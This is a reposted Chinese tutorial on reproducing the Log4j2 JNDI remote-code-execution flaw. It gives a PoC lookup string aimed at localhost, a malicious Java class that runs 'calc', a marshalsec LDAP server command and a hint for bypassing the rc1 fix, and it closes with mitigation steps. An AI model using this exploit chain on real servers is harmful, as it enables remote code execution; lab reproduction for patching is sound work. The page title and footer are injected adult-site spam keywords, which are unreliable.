在线观看www成人影院-在线观看www日本免费网站-在线观看www视频-在线观看操-欧美18在线-欧美1级

0
  • 聊天消息
  • 系統消息
  • 評論與回復
登錄后你可以
  • 下載海量資料
  • 學習在線課程
  • 觀看技術視頻
  • 寫文章/發帖/加入社區
會員中心
創作中心

完善資料讓更多小伙伴認識你,還能領取20積分哦,立即完善>

3天內不再提示

如何復現Log4j2漏洞

馬哥Linux運維 ? 來源:馬哥Linux運維 ? 2023-02-13 10:55 ? 次閱讀

1. 簡介

ApacheLog4j2是一個開源的Java日志框架,被廣泛地應用在中間件、開發框架與Web應用中。

2. 漏洞概述

該漏洞是由于Apache Log4j2某些功能存在遞歸解析功能,未經身份驗證的攻擊者通過發送特定惡意數據包,可在目標服務器上執行任意代碼。

3. 影響范圍

Apache Log4j 2.x <= 2.15.0-rc1

4. 環境搭建

1、創建一個新的maven項目,并導入Log4j的依賴包


org.apache.logging.log4j
log4j-core
2.14.1

漏洞利用

1、使用POC測試

importorg.apache.logging.log4j.LogManager;
importorg.apache.logging.log4j.Logger;
classLogTest{
publicstaticfinalLoggerlogger=LogManager.getLogger();
publicstaticvoidmain(String[]args){
logger.error("${jndi//localhost:8888/Exploit}");
}
}

2、編譯一惡意類Exploit.class

首先新建exp.java,然后編譯為class文件

classExploit{
static{
System.err.println("Pwned");
try{
Stringcmds="calc";
Runtime.getRuntime().exec(cmds);
}catch(Exceptione){
e.printStackTrace();
}
}
}
javacexp.java

3、使用marshalsec-0.0.3-SNAPSHOT-all.jar本地開啟一個LDAP服務

java-cpmarshalsec-0.0.3-SNAPSHOT-all.jarmarshalsec.jndi.LDAPRefServer
"http://127.0.0.1:7777/#Exploit"8888

ed720a4e-aaa3-11ed-bfe3-dac502259ad0.png

4、運行poc.java,即可訪問惡意類并執行寫在其中的"calc"命令

ed86eff4-aaa3-11ed-bfe3-dac502259ad0.png

結合一些其它 StrLookup 適當變形,以及配合官方測試用例中臟數據"?Type=A Type&Name=1100110&Char=!"可繞過rc1,RC2版本對此異常進行了捕獲。

eda76ae0-aaa3-11ed-bfe3-dac502259ad0.png

5. 修復方式

目前,Apache官方已發布新版本完成漏洞修復,建議用戶盡快進行自查,并及時升級至最新版本:https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2 建議同時采用如下臨時措施進行漏洞防范:

1)添加jvm啟動參數-Dlog4j2.formatMsgNoLookups=true;

2)在應用classpath下添加log4j2.component.properties配置文件,文件內容為log4j2.formatMsgNoLookups=true;

3)JDK使用11.0.1、8u191、7u201、6u211及以上的高版本;

4)部署使用第三方防火墻產品進行安全防護。

聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網站授權轉載。文章觀點僅代表作者本人,不代表電子發燒友網立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規問題,請聯系本站處理。 舉報投訴
  • JAVA
    +關注

    關注

    19

    文章

    2973

    瀏覽量

    104899
  • 漏洞
    +關注

    關注

    0

    文章

    204

    瀏覽量

    15398

原文標題:手把手教你復現 Log4j2 漏洞

文章出處:【微信號:magedu-Linux,微信公眾號:馬哥Linux運維】歡迎添加關注!文章轉載請注明出處。

收藏 人收藏

    評論

    相關推薦

    STM32Cube工具的log4j漏洞CVE-2021-44228和CVE-2021-45046有何影響?

    STM32Cube工具的log4j漏洞CVE-2021-44228和CVE-2021-45046有何影響?
    發表于 12-07 07:02

    Java日志框架中的王者是誰

    不及Apache 的新一代日志框架 - Log4j 目前來看,Log4j2 就是王者,其他日志框架都不是對手 Log4j2簡介 Apache Log4j
    的頭像 發表于 10-13 09:12 ?1380次閱讀

    使用Keysight免費評估Log4j/Log4Shell零日漏洞

    在過去72小時左右的時間里,網絡安全領域的大多數人已經意識到Log4j/Log4Shell零日漏洞及其對大多數web服務器、云應用程序、互聯網設備和嵌入式設備的廣泛影響。你可以閱讀CVE-2021-44228中記錄的所有血淋淋的
    的頭像 發表于 12-21 10:50 ?1562次閱讀

    SafeLog4j解決log4shell漏洞

    safelog4j.zip
    發表于 05-06 11:55 ?2次下載
    SafeLog<b class='flag-5'>4j</b>解決<b class='flag-5'>log4</b>shell<b class='flag-5'>漏洞</b>

    Log4-detector Log4J漏洞版本掃描器

    log4j-detector.zip
    發表于 05-06 11:55 ?0次下載
    <b class='flag-5'>Log4</b>-detector <b class='flag-5'>Log4J</b><b class='flag-5'>漏洞</b>版本掃描器

    log4j-finder Log4Shell漏洞掃描工具

    log4j-finder.zip
    發表于 05-06 11:54 ?1次下載
    <b class='flag-5'>log4j</b>-finder <b class='flag-5'>Log4</b>Shell<b class='flag-5'>漏洞</b>掃描工具

    fix_log4j2 log4j2漏洞緩解工具

    fix_log4j2.zip
    發表于 05-06 10:22 ?0次下載
    fix_<b class='flag-5'>log4j2</b> <b class='flag-5'>log4j2</b><b class='flag-5'>漏洞</b>緩解工具

    華為云VSS漏洞掃描服務為你排除Apache log4j2隱患

    華為云VSS漏洞掃描服務為你排除Apache log4j2隱患 近日Apache Log4j2漏洞持續發酵,已成為中國互聯網2021年年底前最大的安全事件。華為云VSS
    的頭像 發表于 10-13 13:52 ?1028次閱讀
    華為云VSS<b class='flag-5'>漏洞</b>掃描服務為你排除Apache <b class='flag-5'>log4j2</b>隱患

    委派模式——從SLF4J說起

    SLF4J全稱"Simple Logging Facade for Java (SLF4J) ", 它誕生之初的目的,是為了針對不同的log解決方案,提供一套統一的接口適配標準,從而讓業務代碼無須關心使用到的第三方模塊都使用了哪
    的頭像 發表于 01-31 15:12 ?538次閱讀

    log4j日志框架分析

    og4j是Apache下的一款開源的日志框架,能夠滿足我們在項目中對于日志記錄的需求。log4j提供了簡單的API調用,強大的日志格式定義以及靈活的擴展性。使用者可以自己定義Appender來滿足對于日志輸出的需求。在系統中對于記錄日志的需求并不單純。
    的頭像 發表于 02-28 14:32 ?1141次閱讀
    <b class='flag-5'>log4j</b>日志框架分析

    Spring Boot的日志框架使用

    目前市面上常見的日志框架有:slf4j(Simple Logging Facade for Java)、logback、log4jlog4j2、commons-logging(Spring默認日志框架)、JUL(java.ut
    的頭像 發表于 06-02 10:59 ?970次閱讀
    Spring Boot的日志框架使用

    【聲明】請您放心,我們的產品沒有用log4j

    Apachelog4j漏洞11月24日由阿里云安全團隊向Apache官方報告了Apachelog4j遠程代碼執行漏洞。這漏洞的影響范圍太廣(
    的頭像 發表于 12-19 13:51 ?432次閱讀
    【聲明】請您放心,我們的產品沒有用<b class='flag-5'>log4j</b>

    保護Log4j日志中的敏感數據,兩步搞定!

    log4j在準備添加日志消息時調用此方法。在MaskingAppender類中,我們覆蓋這個方法來攔截日志消息,使用maskSensitiveData()方法對敏感數據應用masking,然后將修改后的消息傳遞給超類的append()方法。
    的頭像 發表于 10-18 16:03 ?797次閱讀

    某些bug正常運行時會出現,當打開串口log時又不再復現怎么辦?

    某些bug正常運行時會出現,當打開串口log時又不再復現怎么辦? 在開發過程中,我們經常會遇到一些bug。這些bug會對我們的開發造成一定程度的困擾,有時候甚至會讓我們的軟件崩潰或無法正常運行
    的頭像 發表于 10-31 14:37 ?396次閱讀

    Log4cpp優勢及優點

    命令行、文件、回卷文件、內存、syslog服務器、Win事件日志等; 可以動態控制日志記錄級別,在效率和功能中進行調整; 所有配置可以通過配置文件進行動態調整; 多語言支持,包括Java(log4j
    的頭像 發表于 11-09 14:27 ?724次閱讀
    <b class='flag-5'>Log4</b>cpp優勢及優點
    主站蜘蛛池模板: 成人午夜免费视频毛片| 九色亚洲| 成人18毛片| 在线资源站| 男女视频免费| 丝袜美腿一区| www日本免费| 在线你懂的网址| 欧美男人的天堂| 免费人成网ww44kk44| 2345成人高清毛片| 亚洲天堂一区二区三区| 精品国产柚木在线观看| 亚洲你懂得| 日本人的色道免费网站| 久久青草免费91观看| 国产精品天天爽夜夜欢张柏芝| 97色伦人人| 女bbbbxxxx毛片视频丶| 男人操女人免费网站| 糖心vlog麻豆精东影业传媒| 亚洲色图 欧美| 欧美一区二区视频在线观看| 国产伦子一区二区三区四区| 天天摸天天碰成人免费视频| 1024毛片| 在线免费黄| 日本 韩国 三级 国产 欧美| 国产美女视频免费| 人人干综合| 国产精品任我爽爆在线播放6080| 激情婷婷综合久久久久| 四虎国产精品成人永久免费影视 | 免费任我爽橹视频在线观看| 视频在线高清完整免费观看| 美女被强插| 日韩一级欧美一级在线观看| 天天综合日日噜噜噜| 久久综合色区| 天天插天天干天天操| 黄h视频|